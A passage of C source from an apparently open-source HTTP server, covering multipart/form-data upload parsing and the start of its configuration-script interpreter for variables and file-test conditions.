/* Content-Disposition: form-data; name="TUploadFile"; filename="D:\tools\readme.txt" */
pbgn = cdisp; pend = pbgn + displen;
if (displen < 9 && strncasecmp(pbgn, "form-data", 9) != 0)
return -100;
pbgn += 9;
for (poct = pbgn; poct < pend; ) {
pbgn = skipOver(poct, pend-poct, " \t,;", 4);
if (pbgn >= pend) break;
poct = skipQuoteTo(pbgn, pend-pbgn, ";, \t", 4);
if (!poct) return -100;
pval = skipQuoteTo(pbgn, poct-pbgn, "=", 1);
if (!pval || pval >= poct) continue;
ptmp = rskipOver(pval-1, pval-pbgn, " \t", 2);
if (ptmp < pbgn) continue;
if (ptmp - pbgn + 1 == 4 && strncasecmp(pbgn, "name", 4) == 0) {
pbgn = skipOver(pval+1, poct-pval-1, " \t=\"'", 5);
if (pbgn >= poct) continue;
ptmp = rskipOver(poct-1, poct-pbgn, " \t=\"'", 5);
if (ptmp < pbgn) continue;
len = ptmp - pbgn + 1;
node->name = str_dup(pbgn, len);
} else if (ptmp - pbgn + 1 == 8 && strncasecmp(pbgn, "filename", 8) == 0) {
pbgn = skipOver(pval+1, poct-pval-1, " \t=\"'", 5);
if (pbgn >= poct) continue;
ptmp = rskipOver(poct-1, poct-pbgn, " \t=\"'", 5);
if (ptmp < pbgn) continue;
pval = rskipTo(ptmp, ptmp-pbgn+1, "\\/", 2);
if (!pval || pval < pbgn) pval = pbgn;
else pval++;
len = ptmp - pval + 1;
node->filename = str_dup(pval, len);
node->formtype = 1;
pbgn = node->filename;
pval = pbgn + len;
pval = rskipTo(pval-1, pval-pbgn, ".", 1);
if (pval <= pbgn) {
node->extname = "";
node->basename = str_dup(pbgn, len);
} else {
node->extname = pval;
node->basename = str_dup(pbgn, pval - pbgn);
}
}
}
return 0;
}
/* multipart format is usually used as uploading multi-format contents by POST.
its content-type is:
Content-Type: multipart/form-data; boundary=---------------------------7d706402a6
request body is as following:
<boundary string>\r\n
Content-Disposition: form-data; name="TUploadFile"; filename="D:\tools\readme.txt"
Content-Type: text/plain
\r\n\r\n
<body content>\r\n
<boundary string>\r\n
Content-Disposition: form-data; name="TFileDesc"
\r\n\r\n
<form data>\r\n
<boundary string>--\r\n
*/
int http_form_multipart_parse (void * vmsg, arr_t * formlist)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
chunk_t * chk = NULL;
ckpos_vec_t vec;
int64 iter = 0;
int64 fsize = 0;
int ret = 0;
int64 hdbgn = 0;
int64 hdend = 0;
int64 valpos = 0;
int64 endpos = 0;
int64 bodypos = 0;
int bodylen = 0;
int namelen, valuelen;
char pname[128];
char pvalue[256];
char * boundary;
int blen = 0;
http_form_t * node = NULL;
pat_bmvec_t * patvec1 = NULL;
pat_bmvec_t * patvec2 = NULL;
if (!msg) return -1;
if ((chk = msg->req_body_chunk) == NULL)
return -2;
if (multipart_conttype_parse(msg, &boundary, &blen) < 0)
return -100;
/* parse the request body that contains the form data and file content */
patvec1 = pat_bmvec_alloc(boundary, blen, 0);
patvec2 = pat_bmvec_alloc("\r\n\r\n", 4, 0);
memset(&vec, 0, sizeof(vec));
fsize = chunk_size(chk, 0);
iter = 0;
iter = bm_find_chunk(chk, iter, boundary, blen, patvec1, NULL);
if (iter < 0) {
ret = -100;
goto err_exit;
}
while (iter < fsize) {
iter = iter + blen;
if (fsize - iter == 4 &&
chunk_char(chk, iter + 0, &vec, NULL) == '-' &&
chunk_char(chk, iter + 1, &vec, NULL) == '-' &&
chunk_char(chk, iter + 2, &vec, NULL) == '\r' &&
chunk_char(chk, iter + 3, &vec, NULL) == '\n')
{ ret = 0; goto err_exit; }
iter += 2;
if (iter >= fsize) goto err_exit;
hdend = iter;
bodypos = bm_find_chunk(chk, iter, "\r\n\r\n", 4, patvec2, NULL);
if (bodypos < 0) { ret = 0; goto err_exit;}
bodypos += 4;
endpos = bm_find_chunk(chk, bodypos, boundary, blen, patvec1, NULL);
if (endpos < 0) { ret = -350; goto err_exit; }
iter = endpos;
endpos = chunk_rskip_to(chk, endpos-1, endpos - bodypos, "\r", 1);
if (endpos < 0 || endpos < bodypos) { ret = -360; goto err_exit; }
bodylen = endpos - bodypos;
/* now parse the headers in this section of multipart body */
node = http_form_alloc();
node->valuepos = bodypos;
node->valuelen = bodylen;
while (hdend < bodypos - 4) {
hdbgn = chunk_skip_over(chk, hdend, bodypos-2-hdend, " \t\r\n,;", 6);
if (hdbgn < 0 || hdbgn >= bodypos-2) break;
hdend = chunk_skip_to(chk, hdbgn, bodypos-2-hdbgn, "\r\n", 2);
if (hdend < 0 || hdend >= bodypos-2) break;
valpos = chunk_skip_to(chk, hdbgn, hdend-hdbgn, ":", 1);
if (valpos < 0 || valpos >= hdend) continue;
endpos = chunk_rskip_over(chk, valpos-1, valpos-hdbgn, " \t", 2);
if (endpos < 0 || endpos < hdbgn) continue;
namelen = endpos - hdbgn + 1;
valpos = chunk_skip_over(chk, valpos+1, hdend-valpos-1, " \t", 2);
endpos = chunk_rskip_over(chk, hdend-1, hdend-valpos, " \t", 2);
if (endpos < 0 || endpos < valpos) continue;
valuelen = endpos - valpos + 1;
memset(pname, 0, sizeof(pname));
if (namelen > sizeof(pname) - 1) namelen = sizeof(pname) -1;
chunk_read(chk, pname, hdbgn, namelen, 0);
memset(pvalue, 0, sizeof(pvalue));
if (valuelen > sizeof(pvalue) - 1) valuelen = sizeof(pvalue) -1;
chunk_read(chk, pvalue, valpos, valuelen, 0);
if (namelen == 19 && strncasecmp(pname, "Content-Disposition", 19) == 0) {
http_form_data_parse(node, pvalue, valuelen);
} else if (namelen == 12 && strncasecmp(pname, "Content-Type", 12) == 0) {
node->ctype = str_dup(pvalue, valuelen);
}
}
node->body_chunk = chk;
node->filecache = msg->req_file_cache;
if (formlist)
arr_push(formlist, node);
else
arr_push(msg->req_formlist, node);
}
err_exit:
pat_bmvec_free(patvec1);
pat_bmvec_free(patvec2);
return ret;
}
/* the following codes are obsolated by above */
static int parse_form_node (FormDataNode * node, char * pvalue, int valuelen, char * path)
{
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * ptmp = NULL;
int len = 0;
if (!node) return -1;
/* Content-Disposition: form-data; name="TUploadFile"; filename="D:\tools\readme.txt" */
pbgn = pvalue; pend = pbgn + valuelen;
if (valuelen < 9 && strncasecmp(pbgn, "form-data", 9) != 0)
return -100;
pbgn += 9;
for (poct = pbgn; poct < pend; ) {
pbgn = skipOver(poct, pend-poct, " \t,;", 4);
if (pbgn >= pend) break;
poct = skipQuoteTo(pbgn, pend-pbgn, ";, \t", 4);
if (!poct) return -100;
pval = skipQuoteTo(pbgn, poct-pbgn, "=", 1);
if (!pval || pval >= poct) continue;
ptmp = rskipOver(pval-1, pval-pbgn, " \t", 2);
if (ptmp < pbgn) continue;
if (ptmp - pbgn + 1 == 4 && strncasecmp(pbgn, "name", 4) == 0) {
pbgn = skipOver(pval+1, poct-pval-1, " \t=\"'", 5);
if (pbgn >= poct) continue;
ptmp = rskipOver(poct-1, poct-pbgn, " \t=\"'", 5);
if (ptmp < pbgn) continue;
len = ptmp - pbgn + 1;
memset(node->var, 0, sizeof(node->var));
if (len > sizeof(node->var)-1) len = sizeof(node->var)-1;
memcpy(node->var, pbgn, len);
} else if (ptmp - pbgn + 1 == 8 && strncasecmp(pbgn, "filename", 8) == 0) {
pbgn = skipOver(pval+1, poct-pval-1, " \t=\"'", 5);
if (pbgn >= poct) continue;
ptmp = rskipOver(poct-1, poct-pbgn, " \t=\"'", 5);
if (ptmp < pbgn) continue;
pval = rskipTo(ptmp, ptmp-pbgn+1, "\\/", 2);
if (!pval || pval < pbgn) pval = pbgn;
else pval++;
memset(node->filename, 0, sizeof(node->filename));
memset(node->basename, 0, sizeof(node->basename));
memset(node->extname, 0, sizeof(node->extname));
memset(node->path, 0, sizeof(node->path));
len = ptmp - pval + 1;
if (len > sizeof(node->filename)-1) len = sizeof(node->filename)-1;
memcpy(node->filename, pval, len);
node->fileflag = 1;
pbgn = node->filename, pval = pbgn + str_len(node->filename);
ptmp = rskipTo(pval-1, pval-pbgn, ".", 1);
if (ptmp > pbgn && ptmp < pval-1 && *ptmp=='.') {
len = ptmp-pbgn;
if (len > sizeof(node->basename)-1) len = sizeof(node->basename)-1;
memcpy(node->basename, pbgn, len);
len = pval-ptmp;
if (len > sizeof(node->extname)-1) len = sizeof(node->extname)-1;
memcpy(node->extname, ptmp, len);
} else {
len = pval-pbgn;
if (len > sizeof(node->basename)-1) len = sizeof(node->basename)-1;
memcpy(node->basename, pbgn, len);
}
if (path && (len=str_len(path))>0) {
if (len > sizeof(node->path)-1) len = sizeof(node->path)-1;
memcpy(node->path, path, len);
}
}
}
return 0;
}
int parse_req_multipart_filecache (void * vmsg, char * boundary, int blen, char * path, arr_t * formlist)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
FormDataNode * node = NULL;
char pname[64];
char pvalue[256];
int64 iter = 0;
int64 fsize = 0;
int ret = 0;
pat_bmvec_t * patvec1 = NULL;
pat_bmvec_t * patvec2 = NULL;
void * fbf = NULL;
int64 pos = 0;
int64 hdbgn = 0;
int64 hdend = 0;
int64 valpos = 0;
int64 endpos = 0;
int64 bodypos = 0;
int bodylen = 0;
int namelen = 0;
int valuelen = 0;
if (!msg) return -1;
if (!formlist) return -2;
if (!msg->req_file_cache || !msg->req_multipart) return -100;
fbf = fbuf_init(msg->req_file_name, 64);
if (!fbf) return -200;
patvec1 = pat_bmvec_alloc(boundary, blen, 1);
patvec2 = pat_bmvec_alloc("\r\n\r\n", 4, 1);
fsize = fbuf_size(fbf);
iter = 0;
pos = bm_find_filebuf(fbf, iter, boundary, blen, 0, patvec1, NULL);
if (pos < 0) {
ret = -100;
goto err_exit;
}
while (iter < fsize) {
iter = pos + blen;
if (fsize - iter <= 4) { ret = 0; goto err_exit; }
iter += 2;
hdbgn = iter;
pos = bm_find_filebuf(fbf, iter, "\r\n\r\n", 4, 0, patvec2, NULL);
if (pos < 0) { ret = 0; goto err_exit;}
bodypos = pos + 4;
pos = bm_find_filebuf(fbf, iter, boundary, blen, 0, patvec1, NULL);
if (pos < 0) { ret = -350; goto err_exit; }
endpos = fbuf_rskip_to(fbf, pos, pos - bodypos, "\r", 1);
if (endpos < 0 || endpos < bodypos) { ret = -360; goto err_exit; }
bodylen = endpos - bodypos;
/* now parse the headers in this section of multipart body */
node = kzalloc(sizeof(*node));
node->bodypos = bodypos;
node->bodylen = bodylen;
hdend = hdbgn;
while (hdend < bodypos - 4) {
fbuf_mmap(fbf, hdend);
hdbgn = fbuf_skip_over(fbf, hdend, bodypos-2-hdbgn, " \t\r\n,;", 6);
if (hdbgn < 0 || hdbgn >= bodypos-2) break;
hdend = fbuf_skip_to(fbf, hdbgn, bodypos-2-hdbgn, "\r\n", 2);
if (hdend < 0 || hdend >= bodypos-2) break;
valpos = fbuf_skip_to(fbf, hdbgn, hdend-hdbgn, ":", 1);
if (valpos < 0 || valpos >= hdend) continue;
endpos = fbuf_rskip_over(fbf, valpos-1, valpos-hdbgn, " \t", 2);
if (endpos < 0 || endpos < hdbgn) continue;
namelen = endpos - hdbgn + 1;
valpos = fbuf_skip_over(fbf, valpos+1, hdend-valpos-1, " \t", 2);
endpos = fbuf_rskip_over(fbf, hdend-1, hdend-valpos, " \t", 2);
if (endpos < 0 || endpos < valpos) continue;
valuelen = endpos - valpos + 1;
memset(pname, 0, sizeof(pname));
if (namelen > sizeof(pname) - 1) namelen = sizeof(pname) -1;
fbuf_read(fbf, hdbgn, pname, namelen);
memset(pvalue, 0, sizeof(pvalue));
if (valuelen > sizeof(pvalue) - 1) valuelen = sizeof(pvalue) -1;
fbuf_read(fbf, valpos, pvalue, valuelen);
if (namelen == 19 && strncasecmp(pname, "Content-Disposition", 19) == 0) {
parse_form_node(node, pvalue, valuelen, path);
} else if (namelen == 12 && strncasecmp(pname, "Content-Type", 12) == 0) {
node->typelen = valuelen;
if (valuelen > sizeof(node->conttype) - 1)
valuelen = sizeof(node->conttype) - 1;
memcpy(node->conttype, pvalue, valuelen);
}
}
node->filecache = msg->req_file_cache;
strncpy(node->filecachename, msg->req_file_name, sizeof(node->filecachename)-1);
arr_push(formlist, node);
if (node->fileflag == 0) {
if (bodylen > sizeof(node->bodycont) - 1) bodylen = sizeof(node->bodycont) -1;
fbuf_read(fbf, node->bodypos, node->bodycont, bodylen);
}
}
err_exit:
pat_bmvec_free(patvec1);
pat_bmvec_free(patvec2);
fbuf_free(fbf);
return ret;
}
/* When upload file by POST method, Post Body format as follows
<boundary string>\r\n
Content-Disposition: form-data; name="TUploadFile"; filename="D:\tools\readme.txt"
Content-Type: text/plain
\r\n\r\n
<body content>\r\n
<boundary string>\r\n
Content-Disposition: form-data; name="TFileDesc"
\r\n\r\n
<form data>\r\n
<boundary string>--\r\n
actual data package as follows:
-----------------------------7d7127950780
Content-Disposition: form-data; name="TUploadFile"; filename="F:\tmp\onebyte.txt"
Content-Type: text/plain
a
-----------------------------7d7127950780
Content-Disposition: form-data; name="TFileDesc"
hi
-----------------------------7d7127950780--\r\n
Boundary string contained in Header as follows:
Content-Type: multipart/form-data; boundary=---------------------------7d706402a6
*/
int ParseReqMultipartForm (void * vmsg, arr_t * formdatalist)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pbgn = NULL;
char * poct = NULL;
char * pend = NULL;
char * pbody = NULL;
int bodylen = 0;
char * phd = NULL;
char * phdend = NULL;
char * pval = NULL;
char * ptmp = NULL;
int namelen, valuelen;
char * boundary;
HeaderUnit * punit = NULL;
static char * formtype = "multipart/form-data";
int len = 0;
FormDataNode * node = NULL;
char path[128];
pat_kmpvec_t * patvec1 = NULL;
pat_kmpvec_t * patvec2 = NULL;
if (!msg) return -1;
if (!formdatalist) return -2;
punit = http_header_get(msg, 0, "Content-Type", 12);
if (!punit) return -10;
GetRealPath(msg, path, sizeof(path));
/* compare the mime type
Content-Type: multipart/form-data; boundary=---------------------------7d706402a6
*/
pbgn = HUValue(punit); pend = pbgn + punit->valuelen;
pbgn = skipOver(pbgn, pend-pbgn, " \t", 2);
if (!pbgn || pbgn >= pend) return -100;
len = str_len(formtype);
if (pend - pbgn < len) return -101;
if (strncasecmp(pbgn, formtype, len) != 0)
return -200;
/* parse the boundary string, pbgn skips to the begining of key 'boundary' */
pbgn += len;
pbgn = skipOver(pbgn, pend-pbgn, ";, \t", 4);
if (!pbgn || pbgn >= pend) return -201;
poct = skipTo(pbgn, pend-pbgn, "=", 1);
if (!poct || poct >= pend) return -204;
/* pbgn skips to the begining of value of boundary */
pbgn = skipOver(poct + 1, pend - poct - 1, " \t", 2);
if (!pbgn || pbgn >= pend) return -205;
poct = skipTo(pbgn, pend-pbgn, " \t,;\r\n", 6);
if (!poct) return -202;
if (poct <= pbgn) return -203;
len = poct - pbgn;
boundary = pbgn;
if (msg->req_file_cache)
return parse_req_multipart_filecache(msg, boundary, len, path, formdatalist);
/* parse the request body that contains the form data and file content */
pbgn = frameP(msg->req_body_stream);
pend = pbgn + frameL(msg->req_body_stream);
if (pend - pbgn < len) return -300;
patvec1 = pat_kmpvec_alloc(boundary, len, 1, 0);
patvec2 = pat_kmpvec_alloc("\r\n\r\n", 4, 1, 0);
poct = kmp_find_bytes(pbgn, pend-pbgn, boundary, len, patvec1);
if (!poct || poct >= pend) return -301;
while (pbgn < pend) {
pbgn = poct + len;
if (pend - pbgn == 4 && pbgn[0]=='-' && pbgn[1]=='-' && pbgn[2]=='\r' && pbgn[3]=='\n')
return 0;
pbgn += 2;
if (!pbgn || pbgn >= pend) return 0;
pbody = kmp_find_bytes(pbgn, pend-pbgn, "\r\n\r\n", 4, patvec2);
if (!pbody || pbody+4 >= pend) return 0;
pbody += 4;
/* find the body end: \r\n--<boundary string> */
poct = kmp_find_bytes(pbody, pend-pbody, boundary, len, patvec1);
if (!poct) return -350;
if (poct >= pend) return -351;
if (poct <= pbody) return -352;
poct = rskipTo(poct-1, poct-pbody, "\r", 1);
if (!poct) return -360;
if (poct >= pend) return -361;
if (poct <= pbody) return -362;
bodylen = poct - pbody;
/* now parse the headers in this section of multipart body */
node = kzalloc(sizeof(*node));
node->pbody = pbody;
node->bodylen = bodylen;
phdend = pbgn;
while (1) {
phd = skipOver(phdend, pbody-phdend, " \t\r\n,;", 6);
if (!phd || phd >= pbody) break;
phdend = skipTo(phd, pbody-phd, "\r\n", 2);
if (!phdend || phdend <= phd) break;
pval = skipTo(phd, phdend-phd, ":", 1);
if (!pval || pval <= phd) continue;
ptmp = rskipOver(pval-1, pval-phd, " \t", 2);
if (!ptmp || ptmp < phd) continue;
namelen = ptmp - phd + 1;
pval = skipOver(pval+1, phdend-pval-1, " \t", 2);
ptmp = rskipOver(phdend-1, phdend-pval, " \t", 2);
if (!ptmp || ptmp < pval) continue;
valuelen = ptmp - pval + 1;
if (namelen == 19 && strncasecmp(phd, "Content-Disposition", 19) == 0) {
node->pval = pval;
node->valuelen = valuelen;
} else if (namelen == 12 && strncasecmp(phd, "Content-Type", 12) == 0) {
node->typelen = valuelen;
if (valuelen > sizeof(node->conttype) - 1)
valuelen = sizeof(node->conttype) - 1;
memcpy(node->conttype, pval, valuelen);
}
}
parse_form_node(node, node->pval, node->valuelen, path);
arr_push(formdatalist, node);
}
pat_kmpvec_free(patvec1);
pat_kmpvec_free(patvec2);
return 0;
}
<|start_filename|>src/http_script.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#ifdef UNIX
#include <regex.h>
#endif
#if defined(_WIN32) || defined(_WIN64)
#define PCRE_STATIC 1
#include "pcre.h"
#endif
#include "http_listen.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_variable.h"
#include "http_script.h"
typedef char * ScriptParser (void * vhsc, char * p, int slen);
typedef struct script_cmd_s {
char * cmd;
int len;
void * parser;
} scmd_t;
hashtab_t * script_parser_table = NULL;
void * http_script_alloc ()
{
HTTPScript * hsc = NULL;
hsc = kzalloc(sizeof(*hsc));
if (!hsc) return NULL;
hsc->alloc = 1;
return hsc;
}
int http_script_init (void * vhsc, void * vmsg, char * psc, int sclen, uint8 sctype, char * vname, int vtype)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
if (!hsc) return -1;
hsc->msg = vmsg;
hsc->script = psc;
hsc->scriptlen = sclen;
hsc->sctype = sctype;
hsc->replied = 0;
hsc->exitflag = 0;
hsc->reloc = 0;
hsc->retval = NULL;
hsc->retvallen = 0;
hsc->vname = vname;
hsc->vtype = vtype;
return 0;
}
void http_script_free (void * vhsc)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
if (!hsc) return;
if (hsc->retval) {
kfree(hsc->retval);
hsc->retval = NULL;
}
hsc->retvallen = 0;
hsc->msg = NULL;
hsc->script = NULL;
hsc->scriptlen = 0;
hsc->sctype = 0;
hsc->replied = 0;
hsc->exitflag = 0;
hsc->reloc = 0;
hsc->vname = NULL;
hsc->vtype = 0;
if (hsc->alloc) {
kfree(hsc);
}
}
int is_symbol_char (int c)
{
if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
( c >= '0' && c <= '9') || (c == '_') )
return 1;
switch (c) {
case '.':
case '-':
case ':':
case '/':
case '&':
case '?':
case '#':
case '%':
case '@':
case '*':
case '!':
case '~':
case ',':
case ';':
return 1;
}
return 0;
}
static int is_exp_char (int c)
{
if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
( c >= '0' && c <= '9') || (c == '_') )
return 1;
return 0;
}
static int is_var_char (int c)
{
if ( (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c == '_') )
return 1;
return 0;
}
char * trim_var (char * p, int len)
{
int i;
if (!p) return p;
if (len < 0) len = strlen(p);
if (len <= 0) return p;
for ( ; len > 0 && (ISSPACE(p[len-1]) || p[len-1] == '"' || p[len-1] == '\''); len--)
p[len-1] = '\0';
for (i = 0; i < len && (p[i] == '"' || p[i] == '\'' || ISSPACE(p[i])); i++);
return p + i;
}
char * goto_var_end (char * p, int len)
{
char * pbgn = p;
char * pend = NULL;
char * poct = NULL;
if (!p) return p;
if (len < 0) len = strlen(p);
if (len <= 0) return p;
pend = pbgn + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
if (*pbgn != '$') return pbgn;
pbgn++;
if (*pbgn == '{') {
/* ${ fid }$query[0] */
pbgn = skipToPeer(pbgn, pend-pbgn, '{', '}');
if (pbgn >= pend) return pbgn;
return pbgn + 1;
}
poct = pbgn;
while (poct < pend && is_var_char(*poct)) poct++;
if (poct == pbgn) return poct + 1; //$$abc $@abc
if (poct >= pend) return poct;
/* $request_header[accept] */
if (poct < pend && *poct == '[') {
poct = skipToPeer(poct, pend-poct, '[', ']');
if (poct >= pend) return poct;
if (*poct == ']') poct++;
}
return poct;
}
char * goto_symbol_end (char * p, int len)
{
char * pbgn = p;
char * pend = NULL;
if (!p) return p;
if (len < 0) len = strlen(p);
if (len <= 0) return p;
pend = pbgn + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
/* $abc$efg${ fid }istillhere */
for ( ; pbgn < pend; ) {
if (*pbgn == '$') {
pbgn = goto_var_end(pbgn, pend-pbgn);
if (pbgn >= pend) return pbgn;
} else if (*pbgn == '"' || *pbgn == '\'') {
pbgn = skipEscTo(pbgn+1, pend-pbgn-1, pbgn, 1);
if (pbgn >= pend) return pbgn;
pbgn++;
} else if (*pbgn == '(') {
pbgn = skipToPeer(pbgn, pend-pbgn, '(', ')');
if (pbgn >= pend) return pbgn;
pbgn++;
} else if (ISSPACE(*pbgn)) {
return pbgn;
} else {
pbgn++;
}
}
return pbgn;
}
char * get_var_name (char * p, int len, char * vname, int vlen)
{
char * pbgn = p;
char * pend = NULL;
char * poct = NULL;
char * pvarend = NULL;
if (!p) return p;
if (len < 0) len = strlen(p);
if (len <= 0) return p;
if (!vname || vlen <= 0) return p;
vname[0] = '\0';
pend = pbgn + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
if (*pbgn != '$') return pbgn;
if (pbgn[1] == '{') {
poct = skipToPeer(pbgn+1, pend-pbgn-1, '{', '}');
if (!poct || poct >= pend) return poct;
pbgn = skipOver(pbgn+2, poct-pbgn-2, " \t\r\n", 4);
if (pbgn >= poct) return poct + 1;
/* ${ remote_addr }, or ${ query [ fid ] } */
pvarend = rskipOver(poct-1, poct-pbgn, " \t\r\n", 4);
str_secpy(vname, vlen, pbgn, pvarend-pbgn+1);
pbgn = poct + 1;
} else {
poct = pbgn + 1;
while (is_var_char(*poct) && poct < pend) poct++;
if (poct <= pbgn + 1) return pbgn;
/* $request_header[accept] */
if (poct < pend && *poct == '[') {
poct = skipTo(poct, pend-poct, "]", 1);
if (*poct == ']') poct++;
}
str_secpy(vname, vlen, pbgn + 1, poct-pbgn-1);
pbgn = poct;
}
return pbgn;
}
int get_var_value (void * vhsc, char * p, int len, char * value, int vallen, int getvar)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = p;
char * pend = NULL;
char * poct = NULL;
if (!hsc) return -1;
if (!p) return -2;
if (len < 0) len = strlen(p);
if (len <= 0) return -3;
if (!value || vallen <= 0) return -10;
value[0] = '\0';
pend = pbgn + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return -100;
poct = rskipOver(pend-1, pend-pbgn, " \t\r\n\f\v", 6);
if (poct < pbgn) return -101;
pend = poct + 1;
if ( ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) ||
(*pbgn == '(' && *poct == ')') ) {
pbgn++;
poct--;
pend--;
if (pbgn >= pend) return 0;
}
if (getvar)
return http_var_copy(hsc->msg, pbgn, pend-pbgn, value, vallen, NULL, 0, hsc->vname, hsc->vtype);
return str_secpy(value, vallen, pbgn, pend-pbgn);
}
/* if ( -d /opt/abc.html && -x aaa.txt ) */
static int script_if_file_parse (void * vhsc, char * pbgn, int len, char ** pterm)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char buf[4096];
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
#ifdef UNIX
struct stat fs;
#endif
if (pterm) *pterm = pbgn;
if (!hsc || !pbgn || len <= 0) return 0;
pend = pbgn + len;
if (pend - pbgn > 2 && pbgn[0] == '-' &&
(pbgn[1] == 'f' || pbgn[1] == 'd' || pbgn[1] == 'e' || pbgn[1] == 'x'))
{
poct = skipOver(pbgn+2, pend-pbgn-2, " \t\r\n\f\v", 6);
if (poct >= pend) {
if (pterm) *pterm = poct;
return 0;
}
pexpend = goto_symbol_end(poct, pend-poct);
if (pterm) *pterm = pexpend;
get_var_value(hsc, poct, pexpend-poct, buf, sizeof(buf)-1, 1);
poct = trim_var(buf, strlen(buf));
if (pbgn[1] == 'f') {
if (file_is_regular(poct)) return 1;
} else if (pbgn[1] == 'd') {
if (file_is_dir(poct)) return 1;
} else if (pbgn[1] == 'e') {
if (file_exist(poct)) return 1;
} else if (pbgn[1] == 'x') {
#ifdef UNIX
if (file_stat(poct, &fs) < 0) return 0;
if (fs.st_mode & (S_IXUSR | S_IXGRP | S_IXOTH))
return 1;
#endif
}
}
return 0;
}
/* if ( !-d /opt/abc.html && -x aaa.txt ) */
static int script_if_not_file_parse (void * vhsc, char * pbgn, int len, char ** pterm)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char buf[4096];
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
#ifdef UNIX
struct stat fs;
#endif
if (pterm) *pterm = pbgn;
if (!hsc || !pbgn || len <= 0) return 0;
pend = pbgn + len;
if (pend - pbgn > 3 && pbgn[0] == '!' && pbgn[1] == '-' &&
(pbgn[2] == 'f' || pbgn[2] == 'd' || pbgn[2] == 'e' || pbgn[2] == 'x'))
{
poct = skipOver(pbgn+3, pend-pbgn-3, " \t\r\n\f\v", 6);
if (poct >= pend) {
if (pterm) *pterm = poct;
return 0;
}
pexpend = goto_symbol_end(poct, pend-poct);
if (pterm) *pterm = pexpend;
get_var_value(hsc, poct, pexpend-poct, buf, sizeof(buf)-1, 1);
poct = trim_var(buf, strlen(buf));
if (pbgn[2] == 'f') {
if (!file_is_regular(poct)) return 1;
} else if (pbgn[2] == 'd') {
if (!file_is_dir(poct)) return 1;
} else if (pbgn[2] == 'e') {
if (!file_exist(poct)) return 1;
} else if (pbgn[2] == 'x') {
#ifdef UNIX
if (file_stat(poct, &fs) < 0) return 1;
if (!(fs.st_mode & (S_IXUSR | S_IXGRP | S_IXOTH)))
return 1;
#endif
}
}
return 0;
}
static int str_val_type (char * p, int len)
{
int i;
int hasdot = 0;
if (!p) return -1;
if (len < 0) len = strlen(p);
if (len <= 0) return -2;
if (p[0] < '0' || p[0] > '9')
return 0; //string
for (i = 1; i < len; i++) {
if (p[i] == '.') {
hasdot++;
if (hasdot > 1) return 0;
} else if (p[i] < '0' || p[i] > '9') {
return 0; //string
}
}
if (hasdot == 0) return 1; //integer
return 2; //double
}
static int script_if_objcmp (void * vhsc, char * avar, int avarlen, char * cmpsym, char * bvar, int bvarlen)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char bufa[4096];
char bufb[4096];
int lena = 0;
int lenb = 0;
char * pa = NULL;
char * pb = NULL;
int valtypea = 0;
int valtypeb = 0;
int64 aival64 = 0;
int64 bival64 = 0;
double adval = 0;
double bdval = 0;
#ifdef UNIX
regex_t regobj;
regmatch_t pmat[4];
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * regobj = NULL;
char * errstr = NULL;
int erroff = 0;
int ovec[36];
#endif
int ret = 0;
if (!hsc) return 0;
if (!avar || avarlen <= 0) return 0;
if (!cmpsym && strlen(cmpsym) <= 0) return 0;
if (!bvar || bvarlen <= 0) return 0;
get_var_value(hsc, avar, avarlen, bufa, sizeof(bufa)-1, 1);
get_var_value(hsc, bvar, bvarlen, bufb, sizeof(bufb)-1, 1);
pa = trim_var(bufa, strlen(bufa));
pb = trim_var(bufb, strlen(bufb));
lena = strlen(pa);
lenb = strlen(pb);
/* do comparing or matching calculation */
if (strcasecmp(cmpsym, "==") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 == bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtoll(pa, NULL, 10);
bdval = strtoll(pb, NULL, 10);
if (adval == bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) == 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, ">") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 > bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtoll(pa, NULL, 10);
bdval = strtoll(pb, NULL, 10);
if (adval > bdval) return 1;
return 0;
}
return (strcasecmp(pa, pb) > 0) ? 1 : 0;
} else if (strcasecmp(cmpsym, ">=") == 0) {
valtypea = str_val_type(pa, lena);
valtypeb = str_val_type(pb, lenb);
if (valtypea == 1 && valtypeb == 1) {
aival64 = strtoll(pa, NULL, 10);
bival64 = strtoll(pb, NULL, 10);
if (aival64 >= bival64) return 1;
return 0;
} else if (valtypea == 2 && valtypeb == 2) {
adval = strtoll(pa, NULL, 10);
bdval = strtoll(pb, NULL, 10);
